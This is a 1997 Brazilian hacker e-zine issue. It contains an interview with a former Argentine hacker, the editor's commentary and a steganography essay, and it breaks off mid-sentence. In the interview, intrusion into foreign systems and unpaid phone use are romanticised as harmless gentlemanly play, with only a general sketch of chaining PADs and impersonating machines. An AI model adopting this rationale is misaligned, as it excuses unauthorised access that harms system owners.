____                  _          ______ _      _        _
|  _ \                | |        |  ____| |    | |      (_)
| |_) | __ _ _ __ __ _| |_ __ _  | |__  | | ___| |_ _ __ _  ___ __ _
|  _ < / _` | '__/ _` | __/ _` | |  __| | |/ _ \ __| '__| |/ __/ _` |
| |_) | (_| | | | (_| | || (_| | | |____| |  __/ |_| |  | | (_| (_| |
|____/ \__,_|_|  \__,_|\__\__,_| |______|_|\___|\__|_|  |_|\___\__,_|




                        BARATA ELETRICA, numero 15
                        Sao Paulo, 21 de maio, 1997

---------------------------------------------------------------------------

                        Creditos:
                        --------

Este jornal foi escrito por Derneval R. R. da Cunha
(barataeletrica@thepentagon.com http://www.geocities.com/SiliconValley/5620
http://barata-eletrica.home.ml.org)
Com as devidas excecoes, toda a redacao e' minha. Esta' liberada a copia
(obvio) em formato eletronico, mas se trechos forem usados em outras
publicacoes, por favor incluam de onde tiraram e quem escreveu.

DISTRIBUICAO LIBERADA PARA TODOS, desde que mantido o copyright e a gratu-
idade. O E-zine e' gratis e nao pode ser vendido (senao vou querer minha
parte).

Para  contatos (mas nao para receber o e-zine) escrevam para:

barataeletrica@ThePentagon.com  <-- provavelmente minha conta definitiva
curupira@2600.com               <-- minha mais nova conta
rodrigde@spider.usp.br
wu100@fim.uni-erlangen.de

Correio comum:

Caixa Postal 4502
CEP 01061-970
Sao Paulo - SP
BRAZIL

Numeros anteriores:

    ftp://ftp.eff.org/pub/Publications/CuD/Barata_Eletrica
    gopher://gopher.eff.org/11/Publications/CuD/Barata_Eletrica
    http://www.eff.org/pub/Publications/CuD/Barata_Eletrica

ou  ftp://etext.archive.umich.edu/pub/Zines/BerataElectrica
    gopher://gopher.etext.org/00/Zines/BerataElectrica
    (contem ate' o numero 8 e e' assim mesmo que se escreve, erro deles)

                        ATENCAO - ATENCAO - ATENCAO

                  Web Page do Fanzine Barata Eletrica:
                http://www.geocities.com/SiliconValley/5620
                    http://barata-eletrica.home.ml.org
                      Contem arquivos interessantes.
                        ATENCAO - ATENCAO - ATENCAO

                               NO BRASIL:

http://www.inf.ufsc.br/ufsc/cultura/barata.html
http://www.di.ufpe.br/~wjqs
http://www.telecom.uff.br/~buick/fim.html
http://tubarao.lsee.fee.unicamp.br/personal/barata.html
ftp://ftp.ufba.br/pub/barata_eletrica

(Normalmente, sao os primeiros a receber o zine)

MIRRORS - da Electronic Frontier Foundation onde se pode achar o BE
/pub/Publications/CuD.

  UNITED STATES:
etext.archive.umich.edu in /pub/CuD/Barata_Eletrica
ftp.eff.org in /pub/Publications/CuD/Barata_Eletrica
aql.gatech.edu in /pub/eff/cud/Barata_Eletrica
world.std.com in /src/wuarchive/doc/EFF/Publications/CuD/Barata_Eletrica
uceng.uc.edu in /pub/wuarchive/doc/EFF/Publications/CuD/Barata_Eletrica
wuarchive.wustl.edu in /doc/EFF/Publications/CuD/Barata_Eletrica
  EUROPE:
nic.funet.fi in /pub/doc/cud/Barata_Eletrica
                  (Finland)
(or /mirror/ftp.eff.org/pub/Publications/CuD/Barata_Eletrica)
ftp.warwick.ac.uk in /pub/cud/Barata_Eletrica  (United Kingdom)
  JAPAN:
 ftp.glocom.ac.jp in /mirror/ftp.eff.org/Publications/CuD/Barata_Eletrica
 www.rcac.tdi.co.jp in /pub/mirror/CuD/Barata_Eletrica




OBS: Para quem nao esta' acostumado com arquivos de extensao .gz:
Na hora de fazer o ftp, digite binary + enter, depois digite
o nome do arquivo sem a  extensao .gz
Existe um descompactador no ftp.unicamp.br, oak.oakland.edu ou em
qualquer mirror da Simtel, no subdiretorio:

/SimTel/msdos/compress/gzip124.zip to expand it before you can use it.
Uma vez descompactado o arquivo GZIP.EXE, a sintaxe seria:
                           "A>gzip -d arquivo.gz

No  caso,  voce  teria que trazer os  arquivos  be.??.gz  para  o
ambiente DOS com o nome alterado para algo parecido com  be??.gz,
para isso funcionar.


==========================================================================



ULTIMO RECURSO, para quem nao conseguir acessar a Internet de forma direta,
mande carta (nao exagere, o pessoal e' gente fina, mas nao e' escravo,  nao
esquecam aqueles encantamentos como "please" , "por favor" e "obrigado"):

fb2net@netville.com.br    hoffmeister@conex.com.br
drren@conex.com.br        wjqs@di.ufpe.br
aessilva@carpa.ciagri.usp.br dms@embratel.net.br
clevers@music.pucrs.br       rgurgel@eabdf.br
patrick@summer.com.br

#########################################################################
        ASSINATURA DO BARATA ELETRICA VIA CORREIO ELETRONICO
 Para receber o fanzine via email, mesmo quando podendo pegar ele na rede.
 Estou montando um esquema no qual a pessoa envia email para:

 rato.cpd@digicron.com

 com os seguintes dizeres, no corpo da carta:

 assinatura BE seu-email@fulano.xxxx.xx

 entendendo claro que seu email e' seu e-mail, nao a string seu-email. Isso
 porque  nao  vou ler a correspondencia. Qualquer coisa  alem  disso  sera'
 ignorada.
 Como  mesmo  assim vou precisar de gente para me ajudar a  distribuir,  as
pessoas  que tiverem boa vontade tambem podem participar,  enviando   email
para o mesmo endereco eletronico com o subject:

 ajuda BE  seu-email@fulano.xxx.xx

 Provavelmente nao havera' resposta, ja' que e' um acochambramento que
 to planejando. A cada novo numero, vou sortear os voluntarios que irao
 receber primeiro e depois vao distribuir para os preguicosos ou distrai-
 dos ou super-ocupados que querem receber o lance sem fazer ftp ou usar
 WWW. Mas aviso: sera' feita a distribuicao em formato uuencodado.
 Aprendam a usar o uudecode. E nao ha' garantia que a coisa vai funcionar.
 A assinatura comeca a partir do numero seguinte.

 OBSERVACAO: Tem muita gente que esta' enviando carta so' com assinatura
 no conteudo e mais nada. As pessoas que nao seguirem as instrucoes acima
 a risca perigam nao receber. Agradeco ao enorme numero de voluntarios p.
 distribuicao.

 ########################################################################

CREDITOS II :
Sem  palavras  para  agradecer ao pessoal que se ofereceu  para  ajudar  na
distribuicao   do   E-zine, como os voluntarios acima citados,  e   outros,
como o sluz@ufba.br (Sergio do ftp.ufba.br), e o delucca do www.inf.ufsc.br
Igualmente para todos os que me fazem o favor de ajudar a divulgar o Barata
em todas as BBSes pelo Brasil afora.
AGRADECO  TAMBEM  AOS QUE QUEREM ME AJUDAR, "HOSPEDANDO" O  EZINE  EM  SUAS
PAGINAS  OU  FTP-SITES. A PARTIR DO PROXIMO BE, COMECO A  COLOCAR  OS  URLS
DESDE QUE NAO HAJA UM LANCE COMERCIAL (nao quero meu fanzine com propaganda
de qualquer especie, nem do provedor)
OBSERVACAO: Alguns mails colocados eu coloquei sem o username (praticamente
a  maioria)  por  levar  em  conta que  nem  todo  mundo  quer  passar  por
colaborador  do  BE. Aqueles que quiserem assumir a carta, mandem  um  mail
para mim e numa proxima edicao eu coloco.

###########################################################################


                                INTRODUCAO
                                ==========

Como de costume, explicar um pouco porque esse intervalo de tempo entre uma
edicao e outra... terminei a ultima edicao e fui para a Argentina, via RGS,
rapidinho. Estava afins de encontrar a mesma mocada e tambem aproveitar  um
pouco  o as parcas ferias que minha bolsa de aperfeicoamento me  dava.  Uma
merda.  Uma porque nao consegui chegar la' antes do ano novo.  Duas  porque
cheguei  la' com poucos dolares, fui no Banco de Boston sacar com um  VISA-
Ourocard  do Banco do Brasil que tive um p(*) dum trabalho  pra  conseguir.
Sabe o que rolou? Nao me sacaram nenhuma grana e ainda por cima me  falaram
que  o limite de saque do cartao tava esgotado. E isso com o  guardinha  do
lado, pronto pro escandalo, numa sexta-feira. E eu que tinha uma boa imagem
da  Argentina,  diminuiu um pouco. Puxa so' arrumei o cartao  pra  usar  em
viagem...nao  tinha usado nem na Internet. Fazer o que? Mudar de  cartao  e
levar mais cash, na proxima.
     Encontrei o Bomsembiante, que NAO ficou rico com a historia de fazer a
"Virus  Report". Pelo contrario, disse que quando leu meu artigo na 2600  -
Hacker  Quaterly (mais ou menos aquilo q ta' na minha pagina na  geocities)
teve  inveja da minha ideia de nao publicar em papel. A grafica obrigava  a
imprimir o minimo de 10.000 numeros vender bem menos do que isso. Nao ficou
mal, mas parou com a publicacao. Prometeu me mandar recortes da cena hacker
na Argentina incluindo os news clips da Convencao de Hackers de outubro  de
94.  Como  ta'  demorando um pouco, se alguem puder  me  ajudar  com  isso,
agradeco.
     Durante o inicio do ano descobri que tao surgindo novos zines. E  ate'
que  chamo  "ruptura". Alguns caras decidiram que o que eu escrevo  nao  e'
bom,  pra  dizer  o  minimo... acho saudavel.  Todo  mundo  tem  direito  a
liberdade  de  opiniao  e expressao. Nao importa se o  cara  e'  "ista"  de
qualquer  tipo. Todos tem esse direito. Pouco saudavel, o cara  que  enviou
bomba  de  email pra esquina das listas.. nao respeitou essa  liberdade.  E
botou meu nome no meio. Otimo. So' acho q se algum "araponga" comecasse  1a
lista  de  possiveis e futuros "vandalos da rede" iria ficar na  moita  so'
anotando os emails de quem fala mal do BE.  Nao e' muita gente. Vigiar todo
mundo que le^, por outro lado, e' mais complicado. Sempre achei que  estava
"desbravando" o caminho pra muita gente. Sim porque demorou e como  demorou
a aparecer outro e-zine, depois do meu. Qualquer pessoa com pouco  talento,
pode  e  deve  ser  capaz de escrever algo melhor.  Talvez  nao  com  tanta
penetracao e publico. De resto, fico so' pensando naquele ditado: "a inveja
e'  a arma do incompetente". Tem cara q. nao sabe disso e  fica  escrevendo
umas  cartas do tipo: "tu nao e' de nada, eu sou melhor". E dai'?  Qualquer
cara  de  16  anos  tem  condicao de se tornar  muito  melhor  do  que  eu.
Simplesmente porque tem mais tempo pela frente. Talvez nem tenha  problemas
de emprego. Eu, eu tenho um nome a zelar, contas pra pagar, etc..
     Fico  chateado,  mas nao muito. Quando comecei o  fanzine,  tinha  que
explicar  tudo,  ate'  como  usar PGP. Agora nao.  Ja'  tem  uma  atmosfera
favorecendo  ate'  gente que contribua para coisas com a  quais  nao  quero
mexer.  Afinal  de  contas,  queima o filme falar  "como  fazer  uma  bomba
caseira". Mesmo que um cara que fez isso aqui em Sampa tenha aprendido isso
no  cinema.  Estou editando o Barata  pensando no fato de que se  a  pessoa
quiser, pode perfeitamente procurar sozinha suas proprias receitas...
Prefiro que a pessoa aprenda a "pescar" na rede, ao inves de dar o peixe na
mao. E.. Antes reputacao de burro do que de demente ou vandalo.
     A  razao  da  demora do numero foi que arrumei um  lance  montando  um
servidor  internet.  Ja' to por dentro de trocentas manhas  que  antes  nao
tinha.  E  como sou ignorante, meu Deus! A gente so'  descobre  fazendo  as
coisas.  Consome  um pouco de tempo aprender a botar algo na  rede.  Depois
piora.  Ruim  mesmo e' que to com indefinicao de moradia tambem.  Mas  tudo
bem. Pelo menos o diploma ta' encaminhado. Meu proximo desafio e' achar  um
patrocinador  pra  ir nos encontros de Hackers que vao rolar  la'  fora.  E
terminar de escrever meu livro sobre hackers. A vida e dura...
     Nota:  teve  uma reporter de uma revista cujo nome nao vou  falar  que
escreveu um artigo sobre um "hacker" contando a vida dele... o^ coisa ruim.
Mais uma vez a imprensa quer mesmo e' retratar vandalismo. So' a escolha de
palavras:  "prisioneiros",  "vinganca", etc quase ignora que  existe  etica
hacker. Legal porque  tem alguns elementos tipicos de  alguns  hackers:  se
gabar pra caramba de coisas que normalmente uma pessoa nao faria. Em grupo,
sim. Um poderia  colecionar senhas de trocentos provedores.  Outro  poderia
colecionar  esquemas  de  "vinganca".  E ai' por  diante.  Nao  sao  coisas
mutuamente excludentes, mas a materia parecia coisa demais pra um cara  so'
fazer.  De qualquer forma o perigo sao os idiotas que vao tentar  imitar  a
revista,  achando que aquilo e' um "hacker". Vao e' detonar para  todos  os
outros que nao pensam em ser vandalos.


INTRODUCAO
CAVALEIROS DA REDE - Reportagem com um hacker
ESTEGANOGRAFIA - A ARTE DE ESCONDER INFORMACAO
HISTORIA RESUMIDA DO BARATA ELETRICA
PARA SUA PROTECAO: O GRANDE IRMAO ESTA' VINDO
UMA SEMANA NA VIDA DO ADMINISTRADOR DE SUPORTE DO INFERNO
ULTIMAS NOTICIAS DO MITNICK
ALGUNS ENCONTROS DE HACKERS NO MUNDO TODO
DEMO CODING: ARTE, HACKING OU OQUE?
NEWS - PIADAS - BUGS - LINUX - DICAS - ETC..
BIBLIOGRAFIA


                    ----------------------------------

               CAVALEIROS DA REDE - Reportagem com um hacker
               =============================================

A revista argentina "Virus Report" entrevistou um dos primeiros hackers do
pais, cujo nome verdadeiro se mantem segredo por motivos obvios. Seu nome de
guerra e' "Chacal". O que se segue e' a transcricao da conversa que foi
mantida com ele. (Esta reportagem foi publicada com permissao do editor da
revista, Fernando Bomsembiante)

VirusReport - Qual sua idade e a que se dedica agora?

Chacal - Naturalmente, esta informacao nao se pode dizer abertamente. A
idade... beirando os trinta. Ocupacao atual... tenho uma empresa de
consultoria na area de informatica, vinculada com o setor de comunicacoes e
redes. E quando era mais jovem me dedicava a hackear: acredito que este e' o
objetivo desta entrevista.

VR - Mais ou menos em que ano e que idade terias?

CH - O pico da atividade foi no ano de 87. Nessa epoca tinha 20 e poucos..
era outra etapa da vida na qual tinha mais tempo para dedicar a este tipo de
coisa.

VR - E porque deixou de faze-lo?

CH - Por um lado, porque e' uma atividade que leva muito tempo. Por outro
lado, porque de alguma maneira pude reestruturar todos os conhecimentos que
adquiri nessa etapa de hacking. Capitalizei-os para dedicar-los a atividade
produtiva e nao ao hacking, que e' algo de hobby, uma diversao.

VR - Para voce, o que e' ser hacker?

CH - Muito se disse sobre o que e' ser um hacker. O conceito popular de
hacker diz que e' uma pessoa que acessa outros computadores de forma nao
ortodoxa, beirando a ilegalidade, depende de como o considera. O personagem
popularizado por peliculas como "Jogos de Guerra", que utilizando os
computadores e redes telefonicas para entrar no Pentagono, na Nasa .. na
realidade se pode acessar diferentes tipos de lugares; claro que todos
querem chegar ao pentagono ou a NASA mas tambem tem centros de informacao,
empresas, companhias, museus, universidades..

VR - Que tipo de coisas fazia nos seus anos dourados?

CH - A atividade do hacker e' investigar onde se pode entrar, como entrar,
como violar a seguranca dos mecanismos de acesso as comunicacoes, as
universidades, as empresas ou centro governamentais no exterior. Uma vez que
se esta' ali e' mais uma atividade de voyer, um jogo de xadrez contra a
seguranca do lugar onde se pretende violar. E' entrar, ver e mais nada. A
intencao do hacker, pelo menos do hacker inteligente, nao e' destruir
informacao, isso e' um pouco infantil. Acessar um sistema para destruir
informacao de gente inocente que nao participam no jogo nao tem graca
nenhuma.

VR - Mas existe gente que quer entrar nos BBS para apagar seus discos...

CH - Isto seria como ir ate' a porta de um colegio e roubar doce de crianca.
Nao tem sentido. Hackear uma BBS e' uma estupidez. Isto e' um servico que
uma pessoa ou instituicao da' para que outros possam comunicar-se. Hackea-la
e destrui-la? Nao, e' ridiculo. Cada um busca o desafio de acordo com sua
capacidade, o que hackea uma bbs sabe que isso e' o seu limite. O verdadeiro
hacker, ou pelo menos o que tem um pouco de capacidade intelectual, pretende
acessar alguma universidade no estrangeiro, ou um centro europeu de
investigacoes nucleares ou uma companhia mineira na Africa do Sul. Cada qual
sabe quais sao as metas que se planeja. O objetivo nunca e' destruir, porque
o hacker quer essencialmente passar despercebido. E' uma satisfacao
intelectual. Eu sei que pude entrar num sistema, pronto. Ao final se
compartilha com um circulo de iniciados. Tem essa caracteristica um pouco
"mistica".

VR- E' muito lindo este teu discurso de pacifismo, mas ha' contas de
telefone enorme pagas por algum outro, chamadas ao exterior, acessos ilegais
e uso de bancos de dados no estrangeiro.. tudo isto custa dinheiro e e'
evidente que voces nao pagam.

CH- Poderiamos considera quase como uma travessura. O uso que um hacker pode
fazer de um sistema no estrangeiro, de um ponto de vista legal, e' uma
contravencao. Na realidade, e' um uso de tempo de computador que nao
representa um custo importante para as empresas que prestam o servico e que
se feito com moderacao nao passa de ser uma transgressao. E' parte dos
custos que a empresa pode assumir, insisto, quando feito moderadamente e de
forma adequada. Pois aquele que entra num sistema e o utiliza para conseguir
informacao tecnica, ou para comunicar-se com gente com a qual faz
intercambio de informacoes nao esta' criando prejuizo significativo. Um
supermercado assume que vai ter um custo porque uma senhora passou com um
menino e quebrou uma garrafa; sao custos que se assumem. Ja' esta' calculado
e nao representa um problema importante. Nos casos de empresas as quais
assessoro e pudem chegar a bancar este tipo de servico, se calcula o custo
de infiltracoes ou de um abuso do sistema.

VR- Agora tens uma posicao bastante dentro da lei. Ha' alguns anos, quando
eras hacker, pensava do mesmo jeito ou era um pouco mais anarquista?

CH-  Provavelmente  era um pouco mais anarquista. Igualmente,  de  qualquer
jeito,  hoje  estou  a favor do livre fluxo da  informacao.  Creio  que  e'
importante  acessar  a informacao, que os computadores  e  as  comunicacoes
entre  computadores  permitam, como dizia Marshall Mac Luhan,  uma  "aldeia
global" (Global Village, nao rede globo - nota do editor).
Insisto  sempre:  mesmo  quando  me dedicava  a  hackear,  fazia  isso  com
criterio, com uma especie de sentido de dever. Era um pouco romantico o que
faziamos  nessa epoca, um desafio com certas regras de jogo  limpo.  Eramos
cavaleiros das redes de computadores. O mesmo talvez se sucede em  qualquer
atividade:  quando isso se massifica, comeca a haver todo tipo de  pessoas,
boas  e ma's, e se perde muitas vezes o sentido original. A pessoa que  ha'
um  mes  atras nao sabia nada de computadores e sem muito  custo  conseguiu
acessar  uma informacao tecnica e de repente pode meter-se em uma  rede  em
qualquer  lugar do mundo nao tem uma consciencia bem formada. O  que  posso
recomendar  a  qualquer  um que se interesse por este  tipo  de  atividades
transgressoras e' que a desfrute, que investigue e que va fazendo as coisas
por  sua conta, de modo sao e com boa fe', que e' realmente  divertido.  E'
como  jogar  xadrez fazendo trapaca, nao tem nenhuma  graca.  A  verdadeira
graca esta' em jogar respeitando as regras do jogo. Isto funciona igual, as
regras  do  jogo   sao:  quebrar a  cabeca  para  conseguir  a  informacao,
conseguir  acessar  e atuar cavalheirescamente, igual a um bom  jogador  de
xadrez.

VR - Penso que uma pessoa nao diz "vou ser um hacker" e no outro dia comeca
a entrar nos bancos de dados no exterior. Como foi teu inicio no tema?

CH - Nos velhos tempos, as coisas eram muito mais complicadas do que  hoje.
Na  epoca da qual estamos falando havia muito poucos modens e  muita  pouca
informacao.  Era tudo um trabalho de folego. Tinha que se comecar do  zero,
investigando e descobrindo, comprando revistas estrangeiras para interar-se
donde  havia  sistemas disponiveis, ler muitissimo, e de  pouco  em  pouco,
podia se interar de onde era possivel acessar. Ai se buscavam as formas  de
chegar... muitas vezes se paga parte da comunicacao e se acessa pelo  outro
lado  por diferentes partes da mesma coisa. No fim, hoje esta'  muito  mais
vulgarizado  e ha' um montao de pseudo-hackers que obteem informacao de  um
amigo  que  sabe  um  pouco  mais, passa  adiante  uma  serie  de  arquivos
completos,  entram, nao sabem como, nao sabem o que fazem, o que e' o  tipo
de  coisa  que nao tem graca. Os usuarios sao muito  pouco  conscientes  da
possibilidade  de  que outra pessoa descubra suas chaves.  Investigando  um
pouco, testando, com muitas horas, com muito tempo, muito trabalho, vai  se
chegando. Na medida que um acessava algo no estrangeiro, comecava a  entrar
em  "redes"  de hackers onde se intercambiava informacao. Um  descobria  um
computador  na  Tanzania de uma empresa em processo de instalacao  e  troca
essa  informacao  por  um  acesso a uma companhia no  Japao,  e  ai'  entao
consegue  informacao porque esse computador no Japao se comunica com  outro
na  Alemanha; entao, sabendo muito de sistemas, se busca arquivos que  deem
uma  pista  de como se esta' comunicando (atraves desse  computador)  e  se
tenta  usar  os  mesmos mecanismos.  Entao se  entra  nesse  computador  da
Alemanha fazendo-se passar pelo computador do Japao e assim se vai  armando
uma corrente na qual se vai encontrando coisas as quais se pode acessar.

VR  - Penso que sua posicao economica atual, bastante boa, se deve ao  fato
de ter se tornado hacker em algum momento da vida?

CH - Indiretamente sim, porque a atividade de hacking me permitiu  adquirir
uma serie de conhecimentos...

VR  -  Nao  me refiro por isto que tenha tido a experiencia  de  roubar  um
banco...

CH  - Nao, nao, por suposicao, isto nao. Adquiri muitos conhecimentos,  que
depois  fui  capaz  de  usar. Hoje em dia,  pude  desenvolver  tecnicas  de
seguranca baseadas nos meus conhecimentos de como acessar outros  sistemas.
Esse conhecimento interno da coisa me permite desenvolver sistemas que  sao
-entre aspas- infaliveis. Sempre entre aspas porque na realidade nao existe
sistema de seguranca perfeito. De certo modo e' o mesmo que perguntar  quem
e'  o  melhor especialista em seguranca de caixas fortes: so'  pode  ser  o
ladrao  de  cofres.  Esse  e'  que mais vai  saber  como  fazer  uma  caixa
inviolavel.  E'  algo  parecido.  Esses  conhecimentos  depois  podem   ser
aplicados  para  fazer o contrario. Nao deixa de ser parte  deste  jogo  de
xadrez,  nada  mais do que no principio se joga de um lado do  tabuleiro  e
depois se troca de lado. Antes o jogo era violar sistemas e agora e'  criar
sistemas seguros e oferecer este servico as empresas.

VR - Quais outros hackers voce conheceu?

CH  - Aqui na Argentina havia um grupo de hackers de importancia media.  Me
recordo do famoso Dr. Trucho, a Nibbier, gente que fazia..

VR - Voce pertencia a este grupo?

CH - Sim, digamos que intercambiavamos informacao, ou encaravamos  projetos
juntos.  Inclusive  o famoso "PUA", Piratas Unidos Argentinos,  que  surgiu
como  uma  mancha no inicio e tomou certa envergadura  depois.  Os  hackers
argentinos  que  havia  neste  momento eram  hackers  conscientes,  e  essa
consciencia surgiu de ter trabalhado desesperadamente. Nao havia amigos  ou
fadas  madrinhas que nos brindassem com arquivos cheios de  informacao.  No
exterior,  por exemplo, conheci muitos hackers importantes: alemaes  (entre
os  quais  se  contavam  o  pessoal  do  Chaos  Computer  Club),  ingleses,
italianos,  australianos e, obviamente, americanos. Nesse momento  existiam
diferentes  lugares onde os hackers trocavam informacao, pontos de  reuniao
ou  grandes bancos de dados somente conhecidos por hackers de  certo  nivel
para cima e uma lenda para os outros que tentavam acessa-los. Eram  lugares
secretos que uns diziam que existiam, que tinham um amigo que alguma vez os
tinha visto e outros diziam que nao, que na realidade eram miragem.  Alguns
eram fantasia e outros realidade.

VR - Esses lugares eram maquinas, bancos de dados?

CH  - Sim, computadores escondidos nas redes mundiais de  comunicacao,  com
acessos que nao estavam nos guias telefonicos de computadores do mundo...

VR - E ai' se intercambiava informacao...

CH  -  Desse  jeito,  ali  podia se encontrar  desde  os  codigos  para  se
movimentar os satelites dos EUA, deixados por gente do Chaos Computer  Club
ate'  como  se infiltrar nas comunicacoes telefonicas da  Australia  ou  os
codigos  de  acesso a uma companhia mineradora sul-africana.  Tambem  havia
informacao tecnica vinculada com as comunicacoes, com os modens, que podiam
ser utilizadas nao somente para hacking, senao para atividades legais.

VR - Pode me dizer alguns nomes destes lugares onde se encontravam?

CH - Um famoso era Altos, um lugar na Alemanha que ninguem conhecia e todos
mencionavam.  Outro  lugar  era AMP, Adventure Multi  Player,  um  jogo  de
aventuras  multiusuario na Inglaterra que alem de ser um jogo de  aventuras
era um lugar de intercambio de informacao.

VR  -  Tens  alguma anedota que pode contar de seus dias  de  hacker,  algo
divertido?

CH   -  Sim,  havia  coisas  divertidas...  por  exemplo,  para  evitar   o
rastreamento   era   comum  entrar  com  algo  que  era  chamado  de   PAD,
computadores  que  permitem a entrada e gerar nova  comunicacao  com  outro
lugar.  Os  hackers  mais paranoicos usavam 4 ou 5  PADs  para  fazer  suas
comunicacoes.  Como  anedotas locais, havia naquele tempo na  Argentina  um
servico  de informacoes com o qual tinhamos uma disputa, coisa de  crianca.
Nos  acessavamos seu sistema e pediamos que reconhecessem nossa  existencia
abrindo  uma  conta em nome de "Grupo Piratas Unidos Argentinos"  (nota  do
editor:  do  meu  ponto de vista, algo idiota e facil d ser rastreado).  Ha
anedotas com o pessoal do "Chaos Computer Club" de Hamburgo, que se meteram
nos  computadores  dos  EUA e, quando se deram conta  de  que  haviam  sido
rastreados, decidiram sacar uma especie de seguro de vida ante o risco  que
fossem desaparecer ou terminar com "perdas extremas", como e'  o  eufemismo
que  a  CIA  usa nestes casos. Algum tempo  depois,  alguns  deles  tiveram
acidentes  inexplicaveis... muitas anedotas nao podem ser  contadas  porque
envolvem conhecimentos que nao sao para difundir.

VR - Alguma vez voce teve algum problema deste nivel ou ameacas?

CH  -  Nao,  a nivel de ameacas nao, mas situacos engracadas.  As  vezes  a
atividade  hacker,  mesmo inocente pode atrapalhar  negociacos  complicadas
entre empresas ou pode provocar outros tipos de incovenientes, onde  muitas
vezes o mesmo hacker nao sabe o que e' que se passa, problemas empresariais
vinculados  com custos de comunicacoes e coisas assim. Isso e' saudavel  de
certo modo. Levando a um plano idealista, o hacker bem intencionado e'  uma
especie  de Robin Hood da informacao, que  permite que todo mundo acesse  a
ela, coisa que de outra forma permaneceria oculta.


              ESTEGANOGRAFIA - A ARTE DE ESCONDER INFORMACAO
              ==============================================

     E' a parte da criptografia que lida com (basicamente) o ocultamento da
mensagem. Compreende tambem metodos alternativos de transmissao e uma serie
de  outras  sub-ciencias que nao vou detalhar aqui, por absoluta  falta  de
tempo. E' talvez um dos ramos da criptografia que tem a maior aplicacao  no
dia-a-dia.  Como diversao, pode ser encontrado na secao de caca-palavra  de
qualquer jornal ou revista. E' usada no ocultamento de marcas de  copyright
(aquela  foto  que voce fez download, mas bem miudinho conserva o  URL  pra
direitos  autorais). Etc, etc.. Pode-se tracar a estenografia  na  historia
desde a antiguidade, quando 1 grego tatuou a mensagem na cabeca raspada  de
1 escravo. Quando o  cabelo cresceu, este foi enviado  atraves  das  linhas
inimigas sem levantar suspeitas. Tudo bem q teve a cabeca raspada de  novo,
depois, para o destinatario ler a mensagem...
     A  diferenca basica entre a criptografia e a estenografia e'  simples:
com  a  criptografia,  se eu recebo uma mensagem que fulano  me  pede  para
entregar a ciclano, imediatamente fico consciente de que:

1) Fulano e ciclano tem seus segredinhos
2) Fulano e ciclano tem um codigo secreto p. se comunicar
3) Fulano e ciclano nao confiam em mim para determinados assuntos
4)   "     e   "     podem estar com algo em andamento, coisa q  nao  posso
saber..

Mesmo  que a mensagem nao seja nada disso, afinal de contas todo mundo  tem
direito  a  um pouco de privacidade (e tem mesmo, ta' na  constituicao),  o
fato  e' que o uso de mensagem secreta num canal aberto pode ser  suspeito.
Inclusive um amigo me relatou que pode ser usado como prova num tribunal de
algo conhecido como "formacao de quadrilha". Pode dar cana, se houver  algo
como  serio  (exemplo: consumo de substancia  alteradora  do  funcionamento
cerebral,  vulgo  entorpecente ou "bagulho", etc, consulte  seu  advogado).
Voltando  ao  ponto inicial, o uso de  criptografia  evidencia  comunicacao
privada  e secreta. Mas o uso de estenografia nao, porque a primeira  vista
nao  existe  a mensagem secreta. Ela esta' invisivel aos olhos de  um  nao-
iniciado.  O conteudo da mensagem tem um sentido claro para o publico e  um
oculto para um grupo restrito. Leiam os textos abaixo.

Subject:[PIADAS-L]

Carta de um soldado a sua noiva.

  Nao imagina, meu amor como estamos ca-
  minhando alegres, apesar de estarmos esma-
  gados nesta luta, estamos indo mesmo a mer-
  ce^ de Deus; nao precisa ficar contraria-
  da, minha querida, pois nao ha priva-
  coes, que logo termina a situacao marca-
  da para tanta gente, todos querem ca-
  minhar a frente, varios noivos estao a nave-
  gar ao mesmo tempo, eh uma lastima, ca-
  bos, sargentos, na flor da idade esma-
  gados por toda parte, ha sem duvidas fe-
  ridos que gemem; moribundos provocan-
  do, invadindo lares, estamos atras de peni-
  tenciarias, pedindo ajuda a pobres e ri-
  cos de todo o mundo.

  Abracos de seu noivo que mi-
  mosamente olha e bei-
 ja a todo instante no seu retrato.

(leia de novo o texto, linha sim, linha nao)

Subject: [PIADAS-L]  Anuncio

   Neste estabelecimento  moderno e de luxo,  encontra-se pu-
   blicamente em exposicao  as mais lindas e confortaveis bo-
   tas baixas,  altas e apertadas, por preco de ocasiao.  Sa-
   patos de verniz, camurca, ultimos modelos. Piteiras ameri-
   canas, bonitas e elegantes, finas e especialmente para fu-
   mar em  saloes, bares e  cafes  elegantes.  Estamos a ven-
   der desde R$ 1,00.  Nossa especialidade =82 exclusiva em cu-
   ecas, camisetas, lencos e blusoes.
   De mocinhas a rapazes de 14 anos, a partir de R$ 0,50. Pu-
   xadores, travessas nacionais e estrangeiras. Jogos de mon-
   taria  completa,  para  diversos precos.  Temos lindos ca-
   nivetes,  artigos de  papelaria,  canetas cartinagens, ba-
   ralhos  de  diversos  tipos e tamanhos,  bem como umas bo-
   necas de  veludo e  pele de raposa.  Fios, trancas e tran-
   cetas especiais, chegadas diretamente de Paris.


   Se voce chegou ao final desse anuncio e nao se interessou
   por nenhum artigo, releia-o pulando uma linha.


Agora para de rir e presta atencao.
A  mensagem  tem um duplo sentido e duas informacoes diferentes. Uma  e'  a
obvia, que nao precisa necessariamente ser verdadeira, basta fazer sentido.
E a outra mensagem que poderia, num caso ficticio, ser ate' verdadeira,  um
soldado servindo no front, com problemas ... esquece.
     E'  uma coisa que as vezes provoca um pouco de paranoia, em tempos  de
censura.  Porque uma mensagem simples, tipo "vou hoje" e' uma coisa.  Agora
dentro   de   determinados  contextos,  significam   coisas   completamente
diferentes.  "Vou hoje", vindo de um doente terminal pode  significar  algo
completamente  diferente do "vou hoje" de um cara num escritorio de suporte
de  micros. Tudo depende do contexto. Entao, aqueles com mais idade vao  se
lembrar daquela musiquinha de natal da TV:

    "Quero ver, voce nao chorar, nao olhar p. tras, nem se  arrepender
    do que faz...
    Quero  ver  o amor vencer, mas se a dor nascer,  voce  resistir  e
    sorrir ..."

E  tem gente ate' hoje que quando se lembra, canta com saudade. Pergunte  a
qualquer um entre 20 e 50 anos q. assistia tv nos anos 70 e 80. Mo'  ibope.
Porque  nao  passa mais propaganda com ela? Bom, teve alguem q.chamou  essa
musica  de "Melo^ do sexo anal".  Pronto. Vai saber se o cara pensou  nisso
quando fez a musica. Mas se encaixou direitinho num outro contexto. Alias o
grande  merito  de obras artisticas  ( e ja'  nao  estou  mais  falando  da
musiquinha) e' exatamente ter essa segunda mensagem escondida.
     "Julinho  da Adelaide" a.k.a. (Also Know As - Tambem  Conhecido  Como)
Chico  Buarque, fez uma musica cujo refrao era "voce nao gosta de mim,  mas
sua filha gosta". O pessoal levou p. outro contexto, ate' q. lembraram q. a
